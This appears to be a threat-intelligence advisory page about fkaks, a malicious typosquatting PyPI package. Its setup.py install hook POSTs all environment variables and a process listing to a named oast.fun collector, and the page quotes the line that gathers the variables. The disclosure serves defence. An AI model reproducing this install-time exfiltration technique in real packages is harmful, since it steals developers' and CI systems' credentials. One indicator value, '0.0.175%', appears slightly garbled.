Supply-chain threat intelligence

Incident detail

criticalpypi·typosquatting·osv

Malicious code in fkaks (PyPI)

fkaks

Risk score

92

AI summary

Indexed incident for fkaks (pypi).

Description

fkaks 0.0.1 ships a setup.py that overrides the install and egg_info commands so that any pip install or pip download of the package unconditionally executes a curl POST to a hardcoded out-of-band collector at http://gjampdwmdjmppwedtkpbbdkq05f6iiz6r.oast.fun. The POST body is built by iterating the entire os.environ mapping (env_vars_string = "&".join([f"{key}={value}" for key, value in env_vars.items()])) and concatenating it with the output of ps -elf, harvesting whatever secrets the installer or CI host has in environment variables (cloud credentials such as AWS_*, GitHub/registry tokens, CI secrets, SSH agent paths) along with a full process listing. The transport is plaintext HTTP to an interactsh-style oast.fun subdomain — infrastructure typical of OOB exfiltration callbacks. The README's framing of the package as a demo of automatic code execution on pip install does not change the on-the-wire behavior: every installer is attacked.

During installation, the package exfiltrates env variables


Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.

Campaign: 2026-06-ip-rotat

Reasons (based on the campaign):

  • The package overrides the install command in setup.py to execute malicious code during installation.

  • exfiltration-env-variables

  • typosquatting

Technical details

Affected versions

=0.0.1

Indicators

  • affected version=0.0.175%

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg

Related incidents